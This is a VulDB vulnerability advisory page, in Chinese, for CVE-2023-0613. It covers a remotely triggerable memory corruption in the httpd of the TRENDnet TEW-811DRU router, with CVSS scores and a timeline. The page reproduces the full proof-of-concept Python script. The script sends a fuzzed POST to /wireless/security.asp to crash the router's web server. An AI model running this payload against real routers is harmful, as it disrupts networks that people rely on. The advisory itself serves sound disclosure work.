TRENDnet TEW-811DRU 1.0.10.0 httpd /wireless/security.asp 内存损坏

CVSS 元温度得分当前攻击价格 (≈)CTI兴趣分数
7.3$0-$5k0.04

TRENDnet TEW-811DRU 1.0.10.0 中已发现分类为致命的漏洞。 受此漏洞影响的是未知功能文件:/wireless/security.asp的组件httpd。 手动调试的不合法输入可导致 内存损坏。 漏洞的CWE定义是 CWE-119。 此漏洞的脆弱性 2023-02-01所披露。

该漏洞被称作为CVE-2023-0613, 攻击可能远程发起, 有技术细节可用。 该漏洞的知名度低于平均水平, 此外还有一个漏洞可利用。 该漏洞利用已公开,可能会被利用。 当前漏洞利用价值为美元大约是 $0-$5k。

它被宣布为proof-of-concept。 可以在vuldb.com下载该漏洞利用。 我们估计的零日攻击价值约为$0-$5k。 该漏洞利用所用的代码是:

import requests,socket
import re
import time
from urllib.parse import urlencode

device_web_ip = '192.168.10.1'

request = {'HEAD': {'Host': b'Z', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0', 'Accept': b',\x80gpsiation//xm', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': b'enc\xbc\xbc\xbc', 'Content-Length': '1209', 'Origin': 'http://0.0.0.0:8080', 'Connection': 'keep-alive', 'Referer': 'http://0.0.0.0:8080/wireless/security.asp', 'Cookie': 'expandable=3c', 'Upgrade-Insecure-Requests': b'\x1d2' }, 'PARAM': {b'ecOe': b'/wireless/srcuri\x81\x80.asp', b'\x86od}': 'Qy4zq80U9FFhnKc0BBTA', 'wl_wps_mode': b'd\x10saDte\x80', b'\x96\x96': b' 5', 'wl_bssid': b'SS', 'security_mode': b'OO:E', b'\x88l\x88l_eu_aZ': 0, 'wl_auth_mode': 'none', b'cc@@zw(': 'enabled', 'wl_akm': b'', 'wl_akm_wpa': b'b\x85nd', 'wl_akm_psk': 'disabled', 'wl_akm_wpa2': b'disniled', 'wl_akm_psk2': b'\xd3isabled', 'wl_wai_cert_index': '', 'wl_wai_cert_status': '', b'\x00\xffak\xffakvv_w': 'disabled', b'wkm_wl_akm_wapi\x05\xff\xff': 'disabled', 'wl_key': 2, b'\x01': 'abcde', b'wl{k@{': 'abcdefabcdefe', b'Sk': b'\x01\x8b\x00', b'7l_+ey': b'a\x80\x00\x00\x01\x8f', 'wl_macmode': b'a\x1c(\x1a\xc2\xba\x04\x00al', 'wl_maclist': 48, b'\x7fmmAc3t0t0': '00:0c:29:d9:40:fe', b'wl_mac\xc3\x8f?\xc3\x86\x045\x00\x80\x1b\xc3\x88\xc3\x96\xc3\xa4S\xc2\x96\xc2\x96$\x00Dh\xc3\xb4\xc3\x9flis\xc3\x8b\x0bX>\t\xc2\xaaQ\x03': '00:0c:29:d9:40:ff', b'glFqacKist2': b'2:0c\x8029::@BJ40!fd', b'lmaylistaclma': '', 'wl_maclist4': '', 'wl_maclist5': b'', b'wleAaclb\x7fg': b'', 'wl_maclist7': b'', b'l_++++wlP++++++*+': '', 'wl_maclist10': b'', 'wl_maclist11': b'', b'w\xff\xff\xee\xff\x86ist\x80\x002': b'', b'wl_wlcl\x05\xff\xff\x053': '', b'hl@\x81B_\x7f\xff\x00\xff14': b'', b'w@_maclis': '', 'wl_maclist16': b'', b'wU_maczist17': b'', 'wl_maclist18': b'', 'wl_maclist19': b'', b'w\xc2\x98\x0b$jl\x87mlymc\x9ai': b'', b'w|\xa1\xa1\xa1\xa1\xa1\xa1\xa1\xa1\xa1\xa1\xa1\xa1': b'', b'a\x00\x00\x02\x00': '', 'wl_maclist23': '', 'wl_maclist24': b'', b'\xa9\x14\twl_maclis\xa9\x14\twl_maclist2': '', 'wl_maclist26': b'', 'wl_maclist27': '', 'wl_maclist28': '', b'wl_l_m\xba\xba\xba\xba\xba\xba': b'', b'l\xff\xff\xfd\xff\xff': b'', 'wl_maclist31': b'', b'J': b'', b'wl_macli\xfft\x00\x02': b'', 'wl_maclist34': b'', 'wl_maclist35': '', b'\x8dlTmaclist36': '', 'wl_maclist37': '', 'wl_maclist38': '', 'wl_maclist39': '', 'wl_maclist40': '', b'sl_maclicl': '', b'\x90l': b'', b'wW_maclist4\xb3': '', 'wl_maclist44': b'', 'wl_maclist45': '', 'wl_maclist46': b'', 'wl_maclist47': b'', b'\x00\x08\x7f': 'Apply', 'wan_apply': '<!--#tr id=', 'mg.alert.7': '', 'wl_key4': b'Q', b'alg.alg.05': b'', 'wl_maclist15': b'', 'expandable': b'', b'\xff\xff\xff\xff45': 4 }, 'ATTR': {'URL': 'http://{}/wireless/security.asp'.format(device_web_ip), 'METHOD': 'POST', 'VERSION': 'HTTP/1.1' } }

headers = request['HEAD'] params = request['PARAM'] method = request['ATTR']['METHOD'] url = request['ATTR']['URL']

try: r = requests.request(method=method,url=url,headers=headers,data=urlencode(params),verify=False,timeout=5) print('Finish attack, to check web state.') except Exception as e: print('error:{}'.format(e))

该漏洞被披露后,此前未曾发表过可能的缓解措施。

产品信息

供应商

名称

版本

许可证

CPE 2.3信息

CPE 2.2信息

CVSSv4信息

VulDB CVSS-B Score: 🔍
VulDB CVSS-BT Score: 🔍
VulDB 向量: 🔍
VulDB 可靠性: 🔍

CVSSv3信息

VulDB 元基础分数: 7.5
VulDB 元温度得分: 7.3

VulDB 基本分数: 7.5
VulDB 温度得分: 6.8
VulDB 向量: 🔍
VulDB 可靠性: 🔍

NVD 基本分数: 7.5
NVD 向量: 🔍

CNA 基本分数: 7.5
CNA 向量 (VulDB): 🔍

CVSSv2信息

AVACAuCIA
💳💳💳💳💳💳
💳💳💳💳💳💳
💳💳💳💳💳💳
向量复杂度身份验证保密正直可用性
开锁开锁开锁开锁开锁开锁
开锁开锁开锁开锁开锁开锁
开锁开锁开锁开锁开锁开锁

VulDB 基本分数: 🔍
VulDB 温度得分: 🔍
VulDB 可靠性: 🔍

NVD 基本分数: 🔍

攻击信息

分类: 内存损坏
CWE: CWE-119
ATT&CK: 未知

本地: 否
远程: 是

可用性: 🔍
访问: 公共
地位: Proof-of-Concept
编程语言: 🔍
下载: 🔍
Google Hack: 🔍

EPSS Score: 🔍
EPSS Percentile: 🔍

价格预测: 🔍
当前价格估算: 🔍

0-Day开锁开锁开锁开锁
今天开锁开锁开锁开锁

威胁情报信息

利益: 🔍
活跃演员: 🔍
活跃的 APT 团体: 🔍

对策信息

建议: 无已知缓解措施
地位: 🔍

0天时间: 🔍

时间轴信息

2023-02-01 🔍
2023-02-01 +0 日 🔍
2023-02-01 +0 日 🔍
2023-03-01 +28 日 🔍

来源信息

地位: 未定义

CVE: CVE-2023-0613 (🔍)
scip Labs: https://www.scip.ch/en/?labs.20161013

条目信息

已创建: 2023-02-01 14時44分
已更新: 2023-03-01 11時37分
更改: 2023-02-01 14時44分 (40), 2023-02-01 14時45分 (2), 2023-02-01 17時52分 (1), 2023-03-01 11時30分 (2), 2023-03-01 11時37分 (27)
完整: 🔍
提交者: leetsun

Submit信息

已接受

  • Submit #76278: Web crash on TRENDnet router TEW-811DRU (由 leetsun)

讨论

暂时没有任何评论。 语言: zh + en.

请登录后发表评论。

Do you want to use VulDB in your project?

Use the official API to access entries easily!